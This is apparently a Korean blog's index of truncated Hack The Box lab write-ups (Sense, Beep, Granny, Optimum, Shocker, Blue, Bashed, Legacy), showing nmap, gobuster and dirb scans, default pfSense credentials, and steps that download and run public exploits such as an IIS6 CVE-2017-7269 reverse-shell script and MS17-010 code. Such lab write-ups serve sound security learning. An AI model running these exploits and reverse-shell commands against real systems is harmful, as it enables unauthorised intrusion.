Wargame
-
[HTB] Sense WriteupWargame/Hack The Box 2022. 1. 17. 17:57
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.255.245 443 port 에 lighttpd 서비스로 웹페이지가 활성화되어있는것을 알 수 있었다. dirb, gobuster 등을 활용하여 웹페이지의 취약 포인트를 찾아보았다. gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.129.255.245 -x php,txt,conf -o bigList /system-users.txt 에서 계정정보로 추정되는 값을 확인 할 수 있었다. password는 디폴트 값이므로 구글링 결과 pfsense 임을 알 수 있었다. 따라서, rohit / pfsense ..
-
[HTB] Beep WriteupWargame/Hack The Box 2022. 1. 16. 21:31
Port Scanning nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.206.83 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-14 08:04 KST Nmap scan report for 10.129.206.83 Host is up (0.19s latency). Not shown: 65519 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1..
-
[HTB] Granny WriteupWargame/Hack The Box 2022. 1. 13. 22:08
Port Scanning nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.95.234 구글링 결과 어렵지 않게 Reverse Shell Exploit Code를 획득 할 수 있었다. wget https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell mv iis6\ reverse\ shell ii6RS.py python ii6RS.py 10.129.95.234 80 10.10.14.80 1234 하지만, 권한때문에 user.txt와 root.txt를 획득 할 수는 없었다. searchsploit과 구글링을 통해 Windows Server 2003..
-
[HTB] Optimum WriteupWargame/Hack The Box 2022. 1. 11. 22:22
포트 스캐닝 nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.1.127 searchsploit HFS 이중 49584.py를 활용하여 Reverse Shell을 통해 user flag를 획득 할 수 있었다. 이제 권한 상승을 시도해보자. Windows의 경우 꽤나 복잡했는데, 구글링을 하다가 좋은 Tool을 발견했다. https://github.com/AonCyberLabs/Windows-Exploit-Suggester GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability d This tool ..
-
[HTB] Shocker WriteupWargame/Hack The Box 2022. 1. 8. 07:16
포트 스캐닝을 통해 대상 머신에 대한 정보를 파악해보자. nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.172.106 80포트와 2222포트가 활성화되어있었다. 웹페이지에 접근별과 아래와같은 화면이 나타날 뿐 별다른 특이점은 발견하지 못했다. dirb 결과 /cgi-bin/ 디렉토리가 존재함을 알 수 있었다. dirb http://10.129.173.251/cgi-bin/ apache, cgi 등 키워드로 구글링을 통해 ShellShock Attack 에 대한 가능성을 확인했다. 공부 결과 /cgi-bin/ 경로 안에 .cgi 혹은 .sh 파일이 필요한것 같아서 dirb에 -X(확장자 지정) 옵션을 더해 재탐색해보았다. dirb http://10.129.173.2..
-
[HTB] Blue WriteupWargame/Hack The Box 2022. 1. 7. 22:49
포트 스캐닝을 통해 대상 머신에 대한 정보를 수집해보자. nmap -sC -sS -sV -O -p- 10.129.172.26 RPC 관련해서 많은 포트가 열려있긴 했지만 일단 smb관련 먼저 보기로 했다. (머신 이름이 Blue어서 이전에 smb 관련하여 이터널블루 취약점을 활용했던게 생각났다) 역시 ms17-010 취약점을 활용하는 문제가 맞는 듯 했다. 이전에 했던것 처럼 mysmb.py를 다운로드하고 exploit을 시도했는데 이전에는 발생하지 않았던 에러가 발생했다. wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py python 42315.py 10.129.172.26 관련해서 구글링을 하다가 아래 자료를 발견했고, 4..
-
[HTB] Bashed WriteupWargame/Hack The Box 2022. 1. 6. 23:36
포트 스캐닝을 통해 대상 머신에 대한 정보를 수집해보자. nmap -sC -sS -sV -O -p- 10.129.171.147 80포트만 열려있어서 접속해보니 아래와같은 페이지가 나타났다. 서버 버전 정보는 아래와 같았고, phpbash라는것에 대한 소개 외 별 기능이 없는거 같아 dirb를 활용해서 탐색해보았다. dirb http://10.129.172.10 /dev 경로가 흥미로워서 접속해보니 phpbash.php 라는 파일이 있었고, phpbash.php 기능 자체가 쉘을 제공하는것이다보니 user.txt 를 쉽게 얻을 수 있었다. 하지만 root 계정 권한이 아니었기 때문에 권한 상승 작업이 필요했다. 위 OS 버전에 따른 권한 상승을 시도해봤다. 여러 exploit 코드 중 44298.c(sea..
-
[HTB] legacy WriteupWargame/Hack The Box 2022. 1. 5. 23:57
포트스캐닝을 통해 대상 머신의 정보를 수집해보자. nmap -sC -sS -sV -O -p- 10.129.1.111 139,445 port의 smb와 닫힌 3389 port가 나온다. windows에서 smb 관련 취약점을 검색하다보니 ms17-010 가 대표적이었고, 아래 스크립트를 통해 취약함을 확인 할 수 있었다. nmap -p 445 --script smb-vuln-ms17-010 10.129.1.111 searchsploit ms17-010 이 중 42315.py 를 활용해보기로 했다. searchsploit -m 42315 주어지는 파일을 바로 실행시키면 에러가 발생하는데, 아래 두 개 자료를 활용해 해결했다. https://github.com/worawit/MS17-010/blob/maste..